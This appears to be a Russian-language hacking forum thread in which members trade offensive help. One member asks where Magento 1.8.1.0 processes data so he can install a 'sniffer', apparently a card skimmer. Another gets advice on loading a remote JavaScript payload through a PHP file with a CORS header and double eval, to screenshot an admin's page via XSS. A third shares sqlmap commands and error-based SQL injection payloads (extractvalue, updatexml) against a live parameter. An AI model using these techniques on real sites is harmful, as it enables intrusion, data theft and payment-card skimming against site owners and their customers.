04.02.2018, 16:44
|
|
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
Провел на форуме:
54593
Репутация:
0
|
|
Сообщение от xaphan
↑
Вряд ли там будут какие-то данные в открытом виде. Это ж система контроля версий (как и гит). Можно попытаться получить все файлы с исходными кодами, вот посоветую
этот
скрипт.
спасибо! помогло!
А есть ли подобная вещь для WYSIWYG? заточенная на поиск загрузку файлов и тд
dirb использую, dirbuster тоже но интересует более узкоспециализированное
|
|
|
04.02.2018, 17:48
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Magento Version 1.8.1.0
Кто нить устанавливал снифер на эту версию? нужна помощь, в каком файле данные обрабатываются?
|
|
|
|
05.02.2018, 20:26
|
|
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114
Репутация:
24
|
|
Есть такои XSS вектор
Хочу сделать скриншот странице админа, нашел все необходимое, но скрипта очень много и засунуть в name="" получится но и за непонятнои фильтрации он никак не заработает, вариант такои засунуть в name="" что то типа инклуда и заинклудить весь .js, какие варианты инклуда есть типо
ЕСТЬ В JS ИНКЛУД ЧЕРЕЗ JS? |
|
|
|
06.02.2018, 12:40
|
|
Участник форума
Регистрация: 31.12.2017
Сообщений: 107
Провел на форуме:
20361
Репутация:
46
|
|
Сообщение от Octavian
↑
Есть такои XSS вектор
Хочу сделать скриншот странице админа, нашел все необходимое, но скрипта очень много и засунуть в name="" получится но и за непонятнои фильтрации он никак не заработает, вариант такои засунуть в name="" что то типа инклуда и заинклудить весь .js, какие варианты инклуда есть типо
ЕСТЬ В JS ИНКЛУД ЧЕРЕЗ JS?
нужно учитывать, что для кроссдоменных запросов от сервера должен приходить заголовок Access-Control-Allow-Origin, поэтому мы делаем запрос не прямиком к js файлу а к php, который отправляет нужный нам заголовок и содержимое js пейлоада
содержимое самого php:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
|
|
|
|
06.02.2018, 14:19
|
|
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114
Репутация:
24
|
|
Сообщение от dmax0fw
↑
нужно учитывать, что для кроссдоменных запросов от сервера должен приходить заголовок Access-Control-Allow-Origin, поэтому мы делаем запрос не прямиком к js файлу а к php, который отправляет нужный нам заголовок и содержимое js пейлоада
содержимое самого php:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
Не хочет
s.php
http://host/images/s/s.php
|
|
|
|
06.02.2018, 14:28
|
|
Участник форума
Регистрация: 31.12.2017
Сообщений: 107
Провел на форуме:
20361
Репутация:
46
|
|
нужно дважды евалить
первый eval() выполняет код из name, то есть получает твой payload, а второй eval() уже выполняет данный payload
|
|
|
|
09.02.2018, 09:42
|
|
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме:
104689
Репутация:
1
|
|
Вопрос по SQL injection
Код:
GET /getaddr.cgi?heataccount=%5c
.SpoilerTarget" type="button">Spoiler: скриншот
Код:
-u https://site.com/getaddr.cgi?heataccount=1%5c --dbs --no-cast --random-agent --dbms=mysql -v5 --level 2 --risk 3
Код:
-u https://site.com/getaddr.cgi?heataccount=%5c -p heataccount --dbs --no-cast --random-agent --level 2 --risk 3
Не катит он тупа не видит
Как раскрутить кто знает ? |
|
|
|
09.02.2018, 10:48
|
|
Флудер
Регистрация: 19.06.2015
Сообщений: 4,126
Провел на форуме:
759330
Репутация:
147
|
|
Сообщение от Sensoft
↑
Как раскрутить кто знает ?
Руками может?
|
|
|
|
09.02.2018, 15:00
|
|
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме:
96779
Репутация:
5
|
|
Сообщение от Sensoft
↑
Вопрос по SQL injection
Код:
GET /getaddr.cgi?heataccount=%5c
Spoiler: скриншот
Код:
-u https://site.com/getaddr.cgi?heataccount=1%5c --dbs --no-cast --random-agent --dbms=mysql -v5 --level 2 --risk 3
Код:
-u https://site.com/getaddr.cgi?heataccount=%5c -p heataccount --dbs --no-cast --random-agent --level 2 --risk 3
Не катит он тупа не видит
Как раскрутить кто знает ?
level=5 попробуй в мапе, ну и руками error based вектор пробуй.
Код:
/getaddr.cgi?heataccount=1" and extractvalue(0x0a,concat(0x0a,(database()))--
/getaddr.cgi?heataccount=1" and updatexml(NULL,concat(0x3a,(database())),Null)--
|
|
|
|
12.02.2018, 14:21
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786
Репутация:
40
|
|
100500 waf
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
